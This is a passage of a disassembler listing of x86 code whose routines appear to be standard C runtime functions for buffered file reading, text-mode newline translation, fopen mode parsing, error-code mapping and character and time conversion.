test eax, eax
jnz short loc_41BD78
and esi, 0FFFFFFDFh
sub esi, 7
loc_41BD78: ; CODE XREF: sub_41BD45+2B�j
mov eax, esi
pop esi
retn
sub_41BD45 endp
; =============== S U B R O U T I N E =======================================
sub_41BD7C proc near ; CODE XREF: sub_41B320+1E1�p
; sub_41B320+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_41BD8E
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41BD8E: ; CODE XREF: sub_41BD7C+7�j
push edx
call sub_41C031
pop ecx
retn
sub_41BD7C endp
; =============== S U B R O U T I N E =======================================
sub_41BD96 proc near ; CODE XREF: sub_41B320+6B�p
; sub_41B320+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_41BDAC
push [esp+arg_4]
push [esp+4+arg_0]
call sub_41EA5F
pop ecx
pop ecx
locret_41BDAC: ; CODE XREF: sub_41BD96+5�j
retn
sub_41BD96 endp
; =============== S U B R O U T I N E =======================================
sub_41BDAD proc near ; CODE XREF: sub_41B320+63�p
; sub_41B320+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_41BDB3: ; CODE XREF: sub_41BDAD+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_41BD7C
mov edi, eax
push edi
call sub_41E8A4
pop ecx
test eax, eax
pop ecx
jnz short loc_41BDB3
mov eax, edi
pop edi
pop esi
retn
sub_41BDAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BDD1 proc near ; CODE XREF: sub_416C44+17�p
; sub_416C44+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_41BDEF
mov ecx, off_435C2C
movzx eax, word ptr [ecx+eax*2]
jmp short loc_41BE41
; ---------------------------------------------------------------------------
loc_41BDEF: ; CODE XREF: sub_41BDD1+10�j
mov ecx, eax
push esi
mov esi, off_435C2C
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_41BE14
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_41BE1D
; ---------------------------------------------------------------------------
loc_41BE14: ; CODE XREF: sub_41BDD1+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_41BE1D: ; CODE XREF: sub_41BDD1+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_41EACD
add esp, 1Ch
test eax, eax
jnz short loc_41BE3D
leave
retn
; ---------------------------------------------------------------------------
loc_41BE3D: ; CODE XREF: sub_41BDD1+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_41BE41: ; CODE XREF: sub_41BDD1+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_41BDD1 endp
; =============== S U B R O U T I N E =======================================
sub_41BE46 proc near ; CODE XREF: sub_416D94+2A�p
; sub_41EEE4+290�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword_493F9C
jnb loc_41BEE0
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:493E60h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_41BEE0
push edi
call sub_41ED9C
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41BEBF
cmp edi, 1
jz short loc_41BE8D
cmp edi, 2
jnz short loc_41BEA3
loc_41BE8D: ; CODE XREF: sub_41BE46+40�j
push 2
call sub_41ED9C
push 1
mov ebp, eax
call sub_41ED9C
pop ecx
cmp eax, ebp
pop ecx
jz short loc_41BEBF
loc_41BEA3: ; CODE XREF: sub_41BE46+45�j
push edi
call sub_41ED9C
pop ecx
push eax
call ds:dword_495358 ; CloseHandle
test eax, eax
jnz short loc_41BEBF
call ds:dword_495328 ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_41BEC1
; ---------------------------------------------------------------------------
loc_41BEBF: ; CODE XREF: sub_41BE46+3B�j
; sub_41BE46+5B�j ...
xor ebp, ebp
loc_41BEC1: ; CODE XREF: sub_41BE46+77�j
push edi
call sub_41ED22
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_41BEDC
push ebp
call sub_41C4E8
pop ecx
jmp short loc_41BEF1
; ---------------------------------------------------------------------------
loc_41BEDC: ; CODE XREF: sub_41BE46+8B�j
xor eax, eax
jmp short loc_41BEF4
; ---------------------------------------------------------------------------
loc_41BEE0: ; CODE XREF: sub_41BE46+E�j
; sub_41BE46+2F�j
and dword_4927F8, 0
mov dword_4927F4, 9
loc_41BEF1: ; CODE XREF: sub_41BE46+94�j
or eax, 0FFFFFFFFh
loc_41BEF4: ; CODE XREF: sub_41BE46+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41BE46 endp
; =============== S U B R O U T I N E =======================================
sub_41BEF9 proc near ; CODE XREF: sub_416D94+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41BF22
test al, 8
jz short loc_41BF22
push dword ptr [esi+8]
call sub_415D6C
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_41BF22: ; CODE XREF: sub_41BEF9+A�j
; sub_41BEF9+E�j
pop esi
retn
sub_41BEF9 endp
; =============== S U B R O U T I N E =======================================
sub_41BF24 proc near ; CODE XREF: sub_41BFC4+2D�p
; sub_41BFC4+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_41BF36
push esi
call sub_41BFC4
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BF36: ; CODE XREF: sub_41BF24+7�j
push esi
call sub_41BF5F
test eax, eax
pop ecx
jz short loc_41BF46
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BF46: ; CODE XREF: sub_41BF24+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41BF5B
push dword ptr [esi+10h]
call sub_41EE76
neg eax
pop ecx
pop esi
sbb eax, eax
retn
; ---------------------------------------------------------------------------
loc_41BF5B: ; CODE XREF: sub_41BF24+26�j
xor eax, eax
pop esi
retn
sub_41BF24 endp
; =============== S U B R O U T I N E =======================================
sub_41BF5F proc near ; CODE XREF: sub_416D94+1A�p
; sub_417E44+37�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi+0Ch]
mov ecx, eax
and ecx, 3
cmp cl, 2
jnz short loc_41BFAC
test ax, 108h
jz short loc_41BFAC
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_41BFAC
push edi
push eax
push dword ptr [esi+10h]
call sub_41E3D1
add esp, 0Ch
cmp eax, edi
jnz short loc_41BFA5
mov eax, [esi+0Ch]
test al, 80h
jz short loc_41BFAC
and al, 0FDh
mov [esi+0Ch], eax
jmp short loc_41BFAC
; ---------------------------------------------------------------------------
loc_41BFA5: ; CODE XREF: sub_41BF5F+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_41BFAC: ; CODE XREF: sub_41BF5F+14�j
; sub_41BF5F+1A�j ...
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41BF5F endp
; =============== S U B R O U T I N E =======================================
sub_41BFBB proc near ; CODE XREF: sub_41E68D�p
push 1
call sub_41BFC4
pop ecx
retn
sub_41BFBB endp
; =============== S U B R O U T I N E =======================================
sub_41BFC4 proc near ; CODE XREF: sub_41BF24+A�p
; sub_41BFBB+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword_493E40, esi
jle short loc_41C022
loc_41BFD5: ; CODE XREF: sub_41BFC4+5C�j
mov eax, dword_492AF0
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41C019
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_41C019
cmp [esp+0Ch+arg_0], 1
jnz short loc_41BFFF
push eax
call sub_41BF24
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41C019
inc ebx
jmp short loc_41C019
; ---------------------------------------------------------------------------
loc_41BFFF: ; CODE XREF: sub_41BFC4+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_41C019
test cl, 2
jz short loc_41C019
push eax
call sub_41BF24
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41C019
or edi, eax
loc_41C019: ; CODE XREF: sub_41BFC4+1B�j
; sub_41BFC4+23�j ...
inc esi
cmp esi, dword_493E40
jl short loc_41BFD5
loc_41C022: ; CODE XREF: sub_41BFC4+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_41C02D
mov eax, edi
loc_41C02D: ; CODE XREF: sub_41BFC4+65�j
pop edi
pop esi
pop ebx
retn
sub_41BFC4 endp
; =============== S U B R O U T I N E =======================================
sub_41C031 proc near ; CODE XREF: sub_416DEA+A9�p
; sub_417A47+2D�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_41C105
test al, 40h
jnz loc_41C105
test al, 2
jz short loc_41C057
or al, 20h
mov [esi+0Ch], eax
jmp loc_41C105
; ---------------------------------------------------------------------------
loc_41C057: ; CODE XREF: sub_41C031+1A�j
or al, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41C06B
push esi
call sub_41E57E
pop ecx
jmp short loc_41C070
; ---------------------------------------------------------------------------
loc_41C06B: ; CODE XREF: sub_41C031+2F�j
mov eax, [esi+8]
mov [esi], eax
loc_41C070: ; CODE XREF: sub_41C031+38�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_41C10A
add esp, 0Ch
mov [esi+4], eax
test eax, eax
jz short loc_41C0F4
cmp eax, 0FFFFFFFFh
jz short loc_41C0F4
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41C0C9
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41C0B2
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword_493E60[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41C0B7
; ---------------------------------------------------------------------------
loc_41C0B2: ; CODE XREF: sub_41C031+6B�j
mov edi, offset dword_436130
loc_41C0B7: ; CODE XREF: sub_41C031+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41C0C9
or dh, 20h
mov [esi+0Ch], edx
loc_41C0C9: ; CODE XREF: sub_41C031+62�j
; sub_41C031+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41C0E6
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41C0E6
test ch, 4
jnz short loc_41C0E6
mov dword ptr [esi+18h], 1000h
loc_41C0E6: ; CODE XREF: sub_41C031+9F�j
; sub_41C031+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C0F4: ; CODE XREF: sub_41C031+55�j
; sub_41C031+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41C105: ; CODE XREF: sub_41C031+A�j
; sub_41C031+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41C031 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C10A proc near ; CODE XREF: sub_416DEA+90�p
; sub_41C031+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, dword_493F9C
jnb loc_41C2E7
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:493E60h[eax*4]
mov eax, dword_493E60[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41C2E7
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41C1BF
test dl, 2
jnz short loc_41C1BF
test dl, 48h
jz short loc_41C17F
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41C17F
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41C17F: ; CODE XREF: sub_41C10A+56�j
; sub_41C10A+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call ds:dword_49538C ; ReadFile
test eax, eax
jnz short loc_41C1D2
call ds:dword_495328 ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_41C1BA
mov dword_4927F4, 9
mov dword_4927F8, ecx
jmp loc_41C2F8
; ---------------------------------------------------------------------------
loc_41C1BA: ; CODE XREF: sub_41C10A+99�j
cmp eax, 6Dh
jnz short loc_41C1C6
loc_41C1BF: ; CODE XREF: sub_41C10A+4C�j
; sub_41C10A+51�j
xor eax, eax
jmp loc_41C2FB
; ---------------------------------------------------------------------------
loc_41C1C6: ; CODE XREF: sub_41C10A+B3�j
push eax
call sub_41C4E8
pop ecx
jmp loc_41C2F8
; ---------------------------------------------------------------------------
loc_41C1D2: ; CODE XREF: sub_41C10A+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41C2E2
test edx, edx
jz short loc_41C1F7
cmp byte ptr [edi], 0Ah
jnz short loc_41C1F7
or al, 4
jmp short loc_41C1F9
; ---------------------------------------------------------------------------
loc_41C1F7: ; CODE XREF: sub_41C10A+E2�j
; sub_41C10A+E7�j
and al, 0FBh
loc_41C1F9: ; CODE XREF: sub_41C10A+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41C2DC
loc_41C211: ; CODE XREF: sub_41C10A+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41C2CC
cmp al, 0Dh
jz short loc_41C22D
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41C2BE
; ---------------------------------------------------------------------------
loc_41C22D: ; CODE XREF: sub_41C10A+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41C24B
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41C242
add [ebp+arg_8], 2
jmp short loc_41C2A0
; ---------------------------------------------------------------------------
loc_41C242: ; CODE XREF: sub_41C10A+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41C2BE
; ---------------------------------------------------------------------------
loc_41C24B: ; CODE XREF: sub_41C10A+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_49538C ; ReadFile
test eax, eax
jnz short loc_41C273
call ds:dword_495328 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41C2BA
loc_41C273: ; CODE XREF: sub_41C10A+15D�j
cmp [ebp+var_C], 0
jz short loc_41C2BA
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41C295
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41C2A0
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41C2BE
; ---------------------------------------------------------------------------
loc_41C295: ; CODE XREF: sub_41C10A+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41C2A5
cmp [ebp+var_1], 0Ah
jnz short loc_41C2A5
loc_41C2A0: ; CODE XREF: sub_41C10A+136�j
; sub_41C10A+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41C2BD
; ---------------------------------------------------------------------------
loc_41C2A5: ; CODE XREF: sub_41C10A+18E�j
; sub_41C10A+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_41CE78
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41C2BE
loc_41C2BA: ; CODE XREF: sub_41C10A+167�j
; sub_41C10A+16D�j
mov byte ptr [edi], 0Dh
loc_41C2BD: ; CODE XREF: sub_41C10A+199�j
inc edi
loc_41C2BE: ; CODE XREF: sub_41C10A+11E�j
; sub_41C10A+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41C211
jmp short loc_41C2DC
; ---------------------------------------------------------------------------
loc_41C2CC: ; CODE XREF: sub_41C10A+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41C2DC
or al, 2
mov [esi], al
loc_41C2DC: ; CODE XREF: sub_41C10A+101�j
; sub_41C10A+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41C2E2: ; CODE XREF: sub_41C10A+DA�j
mov eax, [ebp+var_8]
jmp short loc_41C2FB
; ---------------------------------------------------------------------------
loc_41C2E7: ; CODE XREF: sub_41C10A+12�j
; sub_41C10A+39�j
and dword_4927F8, 0
mov dword_4927F4, 9
loc_41C2F8: ; CODE XREF: sub_41C10A+AB�j
; sub_41C10A+C3�j
or eax, 0FFFFFFFFh
loc_41C2FB: ; CODE XREF: sub_41C10A+B7�j
; sub_41C10A+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C10A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C300 proc near ; CODE XREF: sub_416FF2+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_4929F0
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_41C339
cmp al, 72h
jz short loc_41C332
cmp al, 77h
jnz loc_41C44D
mov ecx, 301h
jmp short loc_41C33E
; ---------------------------------------------------------------------------
loc_41C332: ; CODE XREF: sub_41C300+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41C341
; ---------------------------------------------------------------------------
loc_41C339: ; CODE XREF: sub_41C300+1D�j
mov ecx, 109h
loc_41C33E: ; CODE XREF: sub_41C300+30�j
or esi, 2
loc_41C341: ; CODE XREF: sub_41C300+37�j
push 1
pop edx
loc_41C344: ; CODE XREF: sub_41C300+8B�j
; sub_41C300+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_41C433
cmp edx, ebx
jz loc_41C433
movsx eax, al
cmp eax, 54h
jg short loc_41C3D2
jz short loc_41C3C2
sub eax, 2Bh
jz short loc_41C3AC
sub eax, 19h
jz short loc_41C3A2
sub eax, 0Eh
jz short loc_41C38D
dec eax
jnz loc_41C424
cmp [ebp+var_4], ebx
jnz loc_41C424
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_41C344
; ---------------------------------------------------------------------------
loc_41C38D: ; CODE XREF: sub_41C300+6F�j
cmp [ebp+var_4], ebx
jnz loc_41C424
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_41C344
; ---------------------------------------------------------------------------
loc_41C3A2: ; CODE XREF: sub_41C300+6A�j
test cl, 40h
jnz short loc_41C424
or ecx, 40h
jmp short loc_41C344
; ---------------------------------------------------------------------------
loc_41C3AC: ; CODE XREF: sub_41C300+65�j
test cl, 2
jnz short loc_41C424
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41C344
; ---------------------------------------------------------------------------
loc_41C3C2: ; CODE XREF: sub_41C300+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_41C424
or ecx, eax
jmp loc_41C344
; ---------------------------------------------------------------------------
loc_41C3D2: ; CODE XREF: sub_41C300+5E�j
sub eax, 62h
jz short loc_41C41F
dec eax
jz short loc_41C408
sub eax, 0Bh
jz short loc_41C3F1
sub eax, 6
jnz short loc_41C424
test ch, 0C0h
jnz short loc_41C424
or ch, 40h
jmp loc_41C344
; ---------------------------------------------------------------------------
loc_41C3F1: ; CODE XREF: sub_41C300+DD�j
cmp [ebp+var_8], ebx
jnz short loc_41C424
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_41C344
; ---------------------------------------------------------------------------
loc_41C408: ; CODE XREF: sub_41C300+D8�j
cmp [ebp+var_8], ebx
jnz short loc_41C424
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_41C344
; ---------------------------------------------------------------------------
loc_41C41F: ; CODE XREF: sub_41C300+D5�j
test ch, 0C0h
jz short loc_41C42B
loc_41C424: ; CODE XREF: sub_41C300+72�j
; sub_41C300+7B�j ...
xor edx, edx
jmp loc_41C344
; ---------------------------------------------------------------------------
loc_41C42B: ; CODE XREF: sub_41C300+122�j
or ch, 80h
jmp loc_41C344
; ---------------------------------------------------------------------------
loc_41C433: ; CODE XREF: sub_41C300+4A�j
; sub_41C300+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41EEE4
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41C451
loc_41C44D: ; CODE XREF: sub_41C300+25�j
xor eax, eax
jmp short loc_41C46B
; ---------------------------------------------------------------------------
loc_41C451: ; CODE XREF: sub_41C300+14B�j
mov eax, [ebp+arg_C]
inc dword_4929E8
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41C46B: ; CODE XREF: sub_41C300+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C300 endp
; =============== S U B R O U T I N E =======================================
sub_41C470 proc near ; CODE XREF: sub_416FF2�p
mov edx, dword_493E40
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41C4E1
mov ebx, dword_492AF0
mov edi, ebx
loc_41C48C: ; CODE XREF: sub_41C470+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_41C4A7
test byte ptr [ecx+0Ch], 83h
jz short loc_41C4A2
inc eax
add edi, 4
cmp eax, edx
jl short loc_41C48C
jmp short loc_41C4E1
; ---------------------------------------------------------------------------
loc_41C4A2: ; CODE XREF: sub_41C470+26�j
mov esi, [ebx+eax*4]
jmp short loc_41C4CB
; ---------------------------------------------------------------------------
loc_41C4A7: ; CODE XREF: sub_41C470+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_415CF8
pop ecx
mov ecx, dword_492AF0
mov [edi+ecx], eax
mov eax, dword_492AF0
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41C4E1
mov esi, edi
loc_41C4CB: ; CODE XREF: sub_41C470+35�j
cmp esi, ebp
jz short loc_41C4E1
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41C4E1: ; CODE XREF: sub_41C470+12�j
; sub_41C470+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41C470 endp
; =============== S U B R O U T I N E =======================================
sub_41C4E8 proc near ; CODE XREF: sub_417025+16�p
; sub_417A9E+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword_4927F8, ecx
mov eax, offset dword_435E48
loc_41C4F9: ; CODE XREF: sub_41C4E8+1E�j
cmp ecx, [eax]
jz short loc_41C51D
add eax, 8
inc edx
cmp eax, offset byte_435FB0
jl short loc_41C4F9
cmp ecx, 13h
jb short loc_41C52A
cmp ecx, 24h
ja short loc_41C52A
mov dword_4927F4, 0Dh
retn
; ---------------------------------------------------------------------------
loc_41C51D: ; CODE XREF: sub_41C4E8+13�j
mov eax, dword_435E4C[edx*8]
mov dword_4927F4, eax
retn
; ---------------------------------------------------------------------------
loc_41C52A: ; CODE XREF: sub_41C4E8+23�j
; sub_41C4E8+28�j
cmp ecx, 0BCh
jb short loc_41C544
cmp ecx, 0CAh
mov dword_4927F4, 8
jbe short locret_41C54E
loc_41C544: ; CODE XREF: sub_41C4E8+48�j
mov dword_4927F4, 16h
locret_41C54E: ; CODE XREF: sub_41C4E8+5A�j
retn
sub_41C4E8 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
add eax, 0FFFFFFE0h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C557 proc near ; CODE XREF: sub_4172D3+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_49288C, 0
push ebx
jnz short loc_41C582
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_41C620
cmp eax, 7Ah
jg loc_41C620
sub eax, 20h
jmp loc_41C620
; ---------------------------------------------------------------------------
loc_41C582: ; CODE XREF: sub_41C557+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_41C5B5
cmp dword_435E38, 1
jle short loc_41C5A2
push 2
push ebx
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41C5AD
; ---------------------------------------------------------------------------
loc_41C5A2: ; CODE XREF: sub_41C557+3D�j
mov eax, off_435C2C
mov al, [eax+ebx*2]
and eax, 2
loc_41C5AD: ; CODE XREF: sub_41C557+49�j
test eax, eax
jnz short loc_41C5B5
loc_41C5B1: ; CODE XREF: sub_41C557+AF�j
mov eax, ebx
jmp short loc_41C620
; ---------------------------------------------------------------------------
loc_41C5B5: ; CODE XREF: sub_41C557+34�j
; sub_41C557+58�j
mov edx, off_435C2C
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41C5D8
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_41C5E1
; ---------------------------------------------------------------------------
loc_41C5D8: ; CODE XREF: sub_41C557+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_41C5E1: ; CODE XREF: sub_41C557+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_49288C
call sub_41CC29
add esp, 20h
test eax, eax
jz short loc_41C5B1
cmp eax, 1
jnz short loc_41C613
movzx eax, [ebp+var_4]
jmp short loc_41C620
; ---------------------------------------------------------------------------
loc_41C613: ; CODE XREF: sub_41C557+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_41C620: ; CODE XREF: sub_41C557+14�j
; sub_41C557+1D�j ...
pop ebx
leave
retn
sub_41C557 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C623 proc near ; CODE XREF: sub_4174F2+C9�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
sub ebx, 76Ch
cmp ebx, 46h
jl loc_41C6DF
cmp ebx, 8Ah
jg loc_41C6DF
push esi
push edi
mov edi, [ebp+arg_4]
mov esi, dword_436564[edi*4]
add esi, [ebp+arg_8]
test bl, 3
jnz short loc_41C662
cmp edi, 2
jle short loc_41C662
inc esi
loc_41C662: ; CODE XREF: sub_41C623+37�j
; sub_41C623+3C�j
call sub_41F19D
mov eax, ebx
lea ecx, [ebx-1]
imul eax, 16Dh
sar ecx, 2
mov edx, esi
mov [ebp+var_8], esi
add edx, ecx
mov [ebp+var_10], ebx
add eax, edx
mov edx, [ebp+arg_14]
lea ecx, [eax+eax*2]
mov eax, [ebp+arg_C]
mov [ebp+var_1C], eax
lea ecx, [eax+ecx*8]
imul ecx, 3Ch
add ecx, [ebp+arg_10]
imul ecx, 3Ch
add ecx, dword_436480
dec edi
cmp [ebp+arg_18], 1
mov [ebp+var_14], edi
pop edi
pop esi
lea ecx, [ecx+edx+7C558180h]
mov [ebp+arg_0], ecx
jz short loc_41C6D5
cmp [ebp+arg_18], 0FFFFFFFFh
jnz short loc_41C6DB
cmp dword_436484, 0
jz short loc_41C6DB
lea eax, [ebp+var_24]
push eax
call sub_41F410
pop ecx
